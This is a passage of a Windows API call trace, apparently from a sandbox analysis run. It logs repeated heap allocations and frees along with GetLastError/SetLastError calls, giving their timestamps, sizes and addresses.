Size=0x20) returned 0x22b34a7b410 [0085.448] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b830 [0085.448] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b8c0 [0085.464] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b4d0 [0085.482] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a390d0 | out: hHeap=0x22b349a0000) returned 1 [0085.482] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a37030 | out: hHeap=0x22b349a0000) returned 1 [0085.483] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bcb0 [0085.483] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bda0 [0085.483] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42220 | out: hHeap=0x22b349a0000) returned 1 [0085.483] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42120 | out: hHeap=0x22b349a0000) returned 1 [0085.483] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c57a0 | out: hHeap=0x22b349a0000) returned 1 [0085.483] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.483] GetLastError () returned 0xcb [0085.483] SetLastError (dwErrCode=0xcb) [0085.483] GetLastError () returned 0xcb [0085.483] SetLastError (dwErrCode=0xcb) [0085.485] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.485] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a420a0 [0085.485] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42820 [0085.485] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42820 | out: hHeap=0x22b349a0000) returned 1 [0085.485] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42660 [0085.486] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bce0 [0085.486] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42660 | out: hHeap=0x22b349a0000) returned 1 [0085.486] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a420a0 | out: hHeap=0x22b349a0000) returned 1 [0085.486] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.486] GetLastError () returned 0xcb [0085.486] SetLastError (dwErrCode=0xcb) [0085.486] GetLastError () returned 0xcb [0085.486] SetLastError (dwErrCode=0xcb) [0085.488] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.488] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a426a0 [0085.488] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a423a0 [0085.489] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a423a0 | out: hHeap=0x22b349a0000) returned 1 [0085.489] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42aa0 [0085.489] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b320 [0085.489] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42aa0 | out: hHeap=0x22b349a0000) returned 1 [0085.489] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a426a0 | out: hHeap=0x22b349a0000) returned 1 [0085.489] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.489] GetLastError () returned 0xcb [0085.489] SetLastError (dwErrCode=0xcb) [0085.489] GetLastError () returned 0xcb [0085.489] SetLastError (dwErrCode=0xcb) [0085.490] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.491] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a428a0 [0085.491] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42120 [0085.491] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42120 | out: hHeap=0x22b349a0000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42360 [0085.491] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b920 [0085.491] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42360 | out: hHeap=0x22b349a0000) returned 1 [0085.491] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a428a0 | out: hHeap=0x22b349a0000) returned 1 [0085.491] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.492] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.492] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.492] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a696c0 | out: hHeap=0x22b349a0000) returned 1 [0085.493] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bad0 [0085.493] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x50) returned 0x22b34a35a60 [0085.493] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x10) returned 0x22b34a2fb00 [0085.494] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38860 [0085.494] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a387d0 [0085.494] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38860 | out: hHeap=0x22b349a0000) returned 1 [0085.494] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42420 [0085.495] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a387d0 | out: hHeap=0x22b349a0000) returned 1 [0085.495] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42420 | out: hHeap=0x22b349a0000) returned 1 [0085.495] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ba70 [0085.495] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1460) returned 0x22b36a696c0 [0085.531] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.532] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.532] GetLastError () returned 0xcb [0085.532] SetLastError (dwErrCode=0xcb) [0085.532] GetLastError () returned 0xcb [0085.532] SetLastError (dwErrCode=0xcb) [0085.533] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.534] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42460 [0085.534] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42060 [0085.534] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42060 | out: hHeap=0x22b349a0000) returned 1 [0085.534] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42420 [0085.534] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42420 | out: hHeap=0x22b349a0000) returned 1 [0085.535] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42460 | out: hHeap=0x22b349a0000) returned 1 [0085.535] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.535] GetLastError () returned 0xcb [0085.535] SetLastError (dwErrCode=0xcb) [0085.535] GetLastError () returned 0xcb [0085.535] SetLastError (dwErrCode=0xcb) [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42de0 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42920 [0085.537] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42920 | out: hHeap=0x22b349a0000) returned 1 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42ca0 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c5620 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x168) returned 0x22b349e4c40 [0085.537] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a37e40 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e4c40 | out: hHeap=0x22b349a0000) returned 1 [0085.538] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a37660 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a37660 | out: hHeap=0x22b349a0000) returned 1 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a37e40 | out: hHeap=0x22b349a0000) returned 1 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42ca0 | out: hHeap=0x22b349a0000) returned 1 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42de0 | out: hHeap=0x22b349a0000) returned 1 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5620 | out: hHeap=0x22b349a0000) returned 1 [0085.538] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.538] GetLastError () returned 0xcb [0085.539] SetLastError (dwErrCode=0xcb) [0085.539] GetLastError () returned 0xcb [0085.539] SetLastError (dwErrCode=0xcb) [0085.540] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.540] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42d60 [0085.540] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42fa0 [0085.540] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42fa0 | out: hHeap=0x22b349a0000) returned 1 [0085.540] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42e60 [0085.541] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c5820 [0085.541] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x320) returned 0x22b36c458f0 [0085.541] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a37ed0 [0085.541] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36c458f0 | out: hHeap=0x22b349a0000) returned 1 [0085.541] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a386b0 [0085.541] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a386b0 | out: hHeap=0x22b349a0000) returned 1 [0085.541] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a37ed0 | out: hHeap=0x22b349a0000) returned 1 [0085.541] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42e60 | out: hHeap=0x22b349a0000) returned 1 [0085.542] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42d60 | out: hHeap=0x22b349a0000) returned 1 [0085.542] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5820 | out: hHeap=0x22b349a0000) returned 1 [0085.542] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.542] GetLastError () returned 0xcb [0085.542] SetLastError (dwErrCode=0xcb) [0085.542] GetLastError () returned 0xcb [0085.542] SetLastError (dwErrCode=0xcb) [0085.565] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.565] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a424a0 [0085.565] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42320 [0085.565] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42320 | out: hHeap=0x22b349a0000) returned 1 [0085.566] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a421a0 [0085.566] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c5520 [0085.566] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x190) returned 0x22b349e4c40 [0085.566] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38e00 [0085.566] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e4c40 | out: hHeap=0x22b349a0000) returned 1 [0085.566] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38590 [0085.566] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38590 | out: hHeap=0x22b349a0000) returned 1 [0085.566] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38e00 | out: hHeap=0x22b349a0000) returned 1 [0085.566] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a421a0 | out: hHeap=0x22b349a0000) returned 1 [0085.566] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a424a0 | out: hHeap=0x22b349a0000) returned 1 [0085.567] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5520 | out: hHeap=0x22b349a0000) returned 1 [0085.567] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.567] GetLastError () returned 0xcb [0085.567] SetLastError (dwErrCode=0xcb) [0085.567] GetLastError () returned 0xcb [0085.567] SetLastError (dwErrCode=0xcb) [0085.568] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.568] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42ae0 [0085.568] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42660 [0085.568] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42660 | out: hHeap=0x22b349a0000) returned 1 [0085.568] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42b60 [0085.569] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42b60 | out: hHeap=0x22b349a0000) returned 1 [0085.569] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42ae0 | out: hHeap=0x22b349a0000) returned 1 [0085.569] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.569] GetLastError () returned 0xcb [0085.569] SetLastError (dwErrCode=0xcb) [0085.569] GetLastError () returned 0xcb [0085.569] SetLastError (dwErrCode=0xcb) [0085.570] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.570] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a424a0 [0085.570] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42920 [0085.570] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42920 | out: hHeap=0x22b349a0000) returned 1 [0085.571] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42420 [0085.571] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42420 | out: hHeap=0x22b349a0000) returned 1 [0085.571] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a424a0 | out: hHeap=0x22b349a0000) returned 1 [0085.571] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.571] GetLastError () returned 0xcb [0085.571] SetLastError (dwErrCode=0xcb) [0085.571] GetLastError () returned 0xcb [0085.571] SetLastError (dwErrCode=0xcb) [0085.572] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.572] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a428e0 [0085.572] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42360 [0085.572] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42360 | out: hHeap=0x22b349a0000) returned 1 [0085.572] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42460 [0085.572] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42460 | out: hHeap=0x22b349a0000) returned 1 [0085.572] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a428e0 | out: hHeap=0x22b349a0000) returned 1 [0085.572] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.573] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.573] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.573] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a696c0 | out: hHeap=0x22b349a0000) returned 1 [0085.573] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a35a60 | out: hHeap=0x22b349a0000) returned 1 [0085.573] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f850 | out: hHeap=0x22b349a0000) returned 1 [0085.573] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x28) returned 0x22b34a7f850 [0085.582] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b3b0 [0085.583] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1460) returned 0x22b36a696c0 [0085.583] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.583] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.583] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a696c0 | out: hHeap=0x22b349a0000) returned 1 [0085.583] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f850 | out: hHeap=0x22b349a0000) returned 1 [0085.584] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2fb00 | out: hHeap=0x22b349a0000) returned 1 [0085.584] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7f850 [0085.584] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bd10 [0085.584] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b2c0 [0085.584] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bb30 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b650 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b5c0 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b950 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bd40 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b7a0 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bbc0 [0085.585] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b3e0 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b500 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ba10 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7be30 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b560 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ba40 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bbf0 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b590 [0085.586] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bb90 [0085.587] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b770 [0085.587] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7be60 [0085.587] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bc20 [0085.587] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bc50 [0085.587] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b2f0 [0085.588] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b5f0 [0085.589] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b6b0 [0085.589] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b6e0 [0085.590] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b710 [0085.590] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b7d0 [0085.590] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b800 [0085.590] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b860 [0085.591] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b890 [0085.591] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c640 [0085.591] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bfe0 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c910 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c760 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c940 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c1f0 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c7c0 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c160 [0085.592] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c970 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c790 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ca90 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c190 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c2e0 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c430 [0085.593] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c670 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c520 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c8e0 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c3d0 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bec0 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c6d0 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c4c0 [0085.594] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bef0 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c220 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c550 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c4f0 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bf80 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c6a0 [0085.595] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c010 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ca00 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c9a0 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bfb0 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c580 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c1c0 [0085.596] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bf50 [0085.597] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 